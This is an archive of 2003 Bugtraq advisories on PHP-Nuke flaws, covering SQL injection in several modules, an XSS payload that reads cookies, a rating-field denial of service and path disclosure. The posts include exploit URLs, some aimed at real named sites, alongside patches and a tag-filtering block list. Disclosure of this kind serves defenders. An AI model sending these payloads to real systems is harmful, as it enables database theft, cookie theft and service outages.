101063 2003-05-12 19:52 /95 rader/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Importerad: 2003-05-12 19:52 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: ripe@7a69ezine.org
Mottagare: Bugtraq (import) <4853>
Ärende: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
------------------------------------------------------------
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 010
|-----------------------------------------------------------------------------|
|
| [ PHP-Nuke SQL injection ]
|
\-----------------------------------------------------------------------------/
| 11/05/2003 |
\------------/
Data.
------
+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (including 6.5) y 5.x
+ Exploit: Yes
+ Author: Albert Puigsech Galicia
+ Contact: ripe@7a69ezine.org
Introduction.
-------------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
Description.
------------
Web_Links module, included on PHP-Nuke base package, has
multiple SQL injection (more than 20). The web user may be able to
insert his own SQL code in most of the numeric values included in
querys, because the plugin coder didn't use inverted comas.
Explotation.
------------
If the SQL agent allow us to use an UNION sentence (like
MySQL 4 does) it is possible to extract information about anything
inside the database, of course this includes passwords, personal
data, etc. Otherwise, without UNION posibility we can't access to
other SQL tables that web links management, so the only posiblity is
to play with hits and votes.
Some examples:
[*] On viewlink function:
$result = sql_query("select title,parentid from
".$prefix."_links_categories where cid=$cid", $dbi);
http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>
[*] Vim index.php... There are a lot.
Patch.
-------
There is no patch for this vulnerability. But is easy to add
inverted comas on all numeric values.
Notes.
------
I realy sorprised about PHP-Nuke usage. I can't understand
that a software with PHP-Nuke's security historial may be used. Lot
of vulnerabilty have been discovered on this software in last months,
and there are more bug. Recomandation for PHP-Nuke users: Migrate!
--
---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
---------------------------
(101063) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(Ombruten)
101205 2003-05-13 19:59 /148 rader/ Rynho Zeros Web <hackargentino@gmx.net>
Importerad: 2003-05-13 19:59 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4867>
Kommentar till text 101063 av Albert Puigsech Galicia <ripe@7a69ezine.org>
Ärende: Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
------------------------------------------------------------
I have also discovered a Path Disclosure on PHP-Nuke 6.x, and
others?
Exploit:
http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
If [ any_words ] has a nonnumerical value or a NULL value, this will
produce "path disclosure". In addition to this form, since Ripe has
informed, a SQL Injection can be made.
Patch (this is a temporal patches, but... is running)
In the viewlink function insert the following thing:
------------------------[ CODE ]------------------------
if(!isset($cid) || $cid == NULL || $cid == "" || !is_numeric ($cid))
{
echo "I don't like you >:|";
exit();
}
------------------------[ CODE ]------------------------
------
XyborG
------
Thanks to Verstand & Chiz0
>
/-----------------------------------------------------------------------------\
> | 7 A 6 9 - A d v C:
> 010
>
|-----------------------------------------------------------------------------|
> |
> | [ PHP-Nuke SQL injection ]
> |
>
\-----------------------------------------------------------------------------/
> |
> 11/05/2003 |
>
> \------------/
>
> Data.
> ------
>
> + Type: SQL injection.
>
> + Software: PHP-Nuke
>
> + Versions: 6.x (including 6.5) y 5.x
>
> + Exploit: Yes
>
> + Author: Albert Puigsech Galicia
>
> + Contact: ripe@7a69ezine.org
>
>
>
>
>
> Introduction.
> -------------
>
> PhpNuke is a well known content management system programed
> in PHP by Francisco Bucci, a lot of people use it because it is very
> easy to install and manage.
>
> Description.
> ------------
>
> Web_Links module, included on PHP-Nuke base package, has multiple
> SQL injection (more than 20). The web user may be able to insert his own
> SQL code in most of the numeric values included in querys, because the
> plugin coder didn't use inverted comas.
>
>
>
>
> Explotation.
> ------------
>
> If the SQL agent allow us to use an UNION sentence (like MySQL 4
> does) it is possible to extract information about anything inside the
> database, of course this includes passwords, personal data, etc.
> Otherwise,
> without UNION posibility we can't access to other SQL tables that web
> links
> management, so the only posiblity is to play with hits and votes.
>
> Some examples:
>
> [*] On viewlink function:
>
> $result = sql_query("select title,parentid from
> ".$prefix."_links_categories where cid=$cid", $dbi);
>
>
>
http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>
>
>
> [*] Vim index.php... There are a lot.
>
>
>
>
> Patch.
> -------
>
> There is no patch for this vulnerability. But is easy to add
> inverted
> comas on all numeric values.
>
> Notes.
> ------
>
> I realy sorprised about PHP-Nuke usage. I can't understand that a
> software with PHP-Nuke's security historial may be used. Lot of
> vulnerabilty have been discovered on this software in last months, and
> there
> are more bug. Recomandation for PHP-Nuke users: Migrate!
>
>
> --
> ---------------------------
> Albert Puigsech Galicia
>
> http://ripe.7a69ezine.org
> ---------------------------
>
--
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
(101205) /Rynho Zeros Web <hackargentino@gmx.net>/(Ombruten)
101206 2003-05-13 20:06 /48 rader/ Ferruh Mavituna <ferruh@mavituna.com>
Importerad: 2003-05-13 20:06 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4868>
Ärende: PHPNuke "Your Account" XSS Vulnerability
------------------------------------------------------------
------------------------------------------------------
PHPNuke "Your Account" XSS Vulnerability
------------------------------------------------------
------------------------------------------------------
Vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 6.5 Final Release
------------------------------------------------------
Not tested but %90 vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5
------------------------------------------------------
About PHPNuke;
------------------------------------------------------
PHP Based Content Management System
http://www.phpnuke.org
------------------------------------------------------
Solution;
------------------------------------------------------
Simple string check or user check should be OK !
------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
*You may need to login first. **Some of servers/PHP Nuke Systems has
a security check for "<script>" strings for Querystrings or POST
variables (ie. www.phphnuke.org). But this systems are still
vulnerable. You can skip these controls with some JS tricks.
Ferruh Mavituna
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com
(101206) /Ferruh Mavituna <ferruh@mavituna.com>/(Ombruten)
101230 2003-05-13 23:41 /133 rader/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Importerad: 2003-05-13 23:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: ripe@7a69ezine.org
Mottagare: Bugtraq (import) <4880>
Ärende: More and More SQL injection on PHP-Nuke 6.5.
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 011
|-----------------------------------------------------------------------------|
|
| [ PHP-Nuke SQL injection ]
|
\-----------------------------------------------------------------------------/
| 13/05/2003 |
\------------/
Data.
- ------
+ Tipy: SQL injection.
+ Software: PHP-Nuke
+ Verions: 6.x (including 6.5) y 5.x
+ Exploit: Yes
+ Author: Albert Puigsech Galicia
+ Contact: ripe@7a69ezine.org
Introduction.
- -------------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
Descriptión.
- ------------
The PHP-Nuke's file download module includes SQL injection
features (as usual). The web user may be able to insert his own SQL
code in most of the numeric values included in querys, because the
plugin coder didn't use inverted comas.
Explotation.
- ------------
If the SQL agent allow us to use an UNION sentence (like
MySQL 4 does) it is possible to extract information about anything
inside the database, of course this includes passwords, personal
data, etc. Otherwise, without UNION posibility we can't access to
other SQL tables that web links management, so the only posiblity is
to play with hits and votes.
Some examples:
[*] On getit function:
- ---
sql_query("update ".$prefix."_downloads_downloads set hits=hits+1
WHERE lid=$lid", $dbi);
$result = sql_query("SELECT url FROM
".$prefix."_downloads_downloads WHERE lid=$lid", $dbi);
- ---
http://www.caxa.ru/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>
[*] On search function:
- ---
$result = sql_query("SELECT lid, cid, title, url, description,
date, hits, downloadratingsummary, totalvotes, totalcomments,
filesize, version, homepage FROM ".$prefix."_downloads_downloads
WHERE title LIKE '%$query%' OR description LIKE '%$query%' ORDER BY
$orderby LIMIT $min,$downloadsresults", $dbi);
- ---
http://www.caxa.ru/modules.php?name=Downloads&d_op=search&min=2%20<our_code>
[*] Vim index.php... There are a lot.
Patch.
- -------
There is no patch for this vulnerability. But is easy to add
inverted comas on all numeric values.
Notes.
- ------
I realy sorprised about PHP-Nuke usage. I can't understand
that a software with PHP-Nuke's security historial may be used. Lot
of vulnerabilty have been discovered on this software in last months,
and there are more bug.
Recomandation for PHP-Nuke users: Migrate!
The are a lot of CMS coded with security in mind, slashcode,
scoop (writen in perl), postnuke, xsphpcms(nice) (wrinten in
php).... and more.
- --
- ---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
- ---------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQE+wV+XwLHT7sE3+RsRAlkJAKCHrMxBRz2loJqPi8kGzFOmAAnN3QCeOhY7
rg1SmIxpzeiM6aaCmMxUdWQ=
=DmRV
-----END PGP SIGNATURE-----
(101230) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(Ombruten)
101734 2003-05-17 20:18 /62 rader/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Importerad: 2003-05-17 20:18 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4935>
Ärende: PHP-Nuke code injection in Yearly Stats at Statistics module
------------------------------------------------------------
-------
Product: PHP-Nuke
Vendor: Francisco Burci
Versions Vulnerable:
6.0 without patches ,
6.0 with index.php and mainfile.php patches.
5.5 with patches ( all resting script tags)
No vulnerable:
6.0 with mainfile.php patch for block url tags inclusions ( not all ).
5.5 with script tags but with the other all.
------
DESCRIPTION:
------
i'm working now in nuke based portals , searching modules that use an URL
based query i found in the Statistics module some bugs:
when you put a string in the url behind the &year variable the module
prints you the character that you put.
i probe iframe and works , script tags works , object works,applet
works,meta works,style works,form works too,img works,comments and ssi
works.
--------
SOLUTION:
--------
Put this code in your mainfile.php :
/*
foreach ($HTTP_GET_VARS as $secvalue) {
if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
(eregi("\"", $secvalue))) {
die ("Oh! .");
}
}
*/
NOTE: Remove comment /* and */.
-----
WHAT CAN BE HAPPEN?
-----
Script and binary objects inclusion. Normally it isn't a problem but
there are many viruses written in vbscript and javascript/JS . Iframe can
be used for a link that an user visits and there is and attack to the
user trough known iframe vulns.
With the code that i provide your'e sure by this little bug.
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
(101734) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/
102046 2003-05-20 22:31 /157 rader/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Importerad: 2003-05-20 22:31 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4956>
Ärende: PHP-Nuke Denial of Service attack and more SQL Injections
------------------------------------------------------------
-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches ,
6.0 with all patches.
5.5 with all patches
No vulnerable:
?
------
DESCRIPTION:
------
New SQL Injections and Paths Disclosures related to the main modules.
Please , look at the final ` , other sql injections don't use this but
this
very important for make a successful query.
--------
FOUND VULNERABLE MODULES:
--------
--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR
QUERY] (NEW)
--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
- http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR
QUERY] &mode=&order=0&thold=0
--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]&orderby=titleD
-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a denial of service possible attack in Downloads module trought
rating system,
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE
TO RATE]&ratinguser=?&ratinghost_name=?
&rating=999999999999999999999999999999999999999999999999999999999999999999
99999
When the file is rated the file gets a 238,609,298.89 rating , this can
be used for make a denial of service attack to the mysql server or send a
very long buffer (buffer overflow, stack crashes). The mysql server puts
this because there's and error with the query ( more characters in field
than the allowed number of characters) if you send a buffer more long
than the allowed/accepted the server be unstable and the system pick up.
Exploit to SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE
TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]
--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`
[YOUR QUERY]&ratetype=num
- Web-Links module is affected by the DoS possible attack that i
discovered and the SQL Injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send ( rating points and the field
buffer , of course ).
--------
SOLUTION:
--------
- Deactivate enterelly the affected modules.
- A temporal workaround for Path Disclosure is configuring in php.ini
the reported error flags ( no report) but this is not very good
solution ( WORKAROUND).
-----
WHAT CAN BE HAPPEN? AND NOTES
-----
Gain Access to phpnuke database , content changing , gain access to
private info, server paths reveled. Mysql server buffer overflow,Mysql
server pick up , server pick up.
-NOTES-
I tested it in phpnuke-espanol.org and it is vulnerable to all.
I tested it in phpnuke.org and it is vulnerable on active modules
affected by this ( Downloads, Surveys )( some errors aren't reported
because php.ini is configured for this but the vulnerabilities are
present.).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
(102046) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/(Ombruten)
102047 2003-05-20 22:35 /34 rader/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Importerad: 2003-05-20 22:35 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4957>
Ärende: PHP-Nuke module PHP-Banner-Exchange path disclosure
------------------------------------------------------------
-------
Product: PHP-Nuke
Vendor: F.Burzi
Module: PHP-Banner Exchange
Version: 1.2
-------
Accessing directly to the PHP Banner Exchange module and without a
specified file :
http://[target]/modules/phpbannerexchange/
( phpbannerexchange module directory )
you get this:
Warning: main(mainfile.php) [function.main]: failed to create stream:
No such file or directory in /home/phpnuke-
/public_html/modules/phpbannerexchange/index.php on line 20
Fatal error: main() [function.main]: Failed opening
required 'mainfile.php' (include_path='') in /home/phpnuke-
/public_html/modules/phpbannerexchange/index.php on line 20
(Paths related your local paths in your server)
---------
SOLUTION:
---------
Configure your php.ini errors flags or by hand-editing the original
module files .
(102047) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/(Ombruten)